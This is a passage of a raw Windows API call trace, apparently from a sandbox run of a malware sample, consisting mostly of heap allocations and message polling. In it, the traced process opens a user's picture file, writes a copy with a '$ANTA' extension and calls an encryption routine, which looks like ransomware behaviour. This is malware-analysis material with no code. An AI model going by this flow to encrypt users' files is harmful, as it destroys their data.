Flags=0x0, Size=0x4) returned 0x43e2810 [0094.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0094.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0094.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0094.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0094.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0094.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0094.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0094.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0094.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0094.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0094.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0094.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0094.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0094.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0094.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0094.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0094.644] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0094.644] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0094.644] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0094.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0094.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0094.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0094.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0094.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0094.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0094.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0094.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0094.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0094.645] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\OjV9.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\ojv9.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0094.645] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.645] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0094.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0094.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0094.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0094.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0094.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0094.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0094.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0094.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.646] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0094.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0094.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0094.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0094.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0094.646] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0094.646] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0094.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0094.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0094.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0094.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0094.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0094.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0094.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0094.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0094.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0094.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0094.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0094.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0094.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0094.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0094.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0094.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0094.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ba0 [0094.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0094.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0094.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0094.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0094.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ba0 | out: hHeap=0x1780000) returned 1 [0094.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0094.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0094.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0094.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0094.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369bb8 [0094.648] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz")) returned 0x10 [0094.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369bb8 | out: hHeap=0x1780000) returned 1 [0094.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0094.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0094.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0094.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0094.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0094.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.649] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\OjV9.png.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\ojv9.png.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0094.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0094.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0094.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0094.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0094.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0094.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.651] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0094.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0094.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0094.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0094.651] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0094.651] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0094.651] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0094.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0094.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0094.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0094.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0094.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0094.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0094.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0094.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0a020 [0094.656] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0094.656] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0xc97b, lpOverlapped=0x0) returned 1 [0094.657] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0094.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0094.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0094.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc97b) returned 0x4516010 [0094.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0a020 | out: hHeap=0x1780000) returned 1 [0094.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0094.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0094.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0094.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0094.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc97b) returned 0x4522998 [0094.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0094.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.661] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0094.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0094.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc97b) returned 0x4516010 [0094.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0094.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0094.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0094.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.662] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0094.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0094.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0094.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0094.662] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d90 [0094.662] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0094.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0094.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0094.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0094.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0094.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0094.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0094.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc97b) returned 0x4516010 [0094.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0094.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0094.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0094.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0094.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0094.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0094.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0094.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0094.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc97b) returned 0x452f320 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 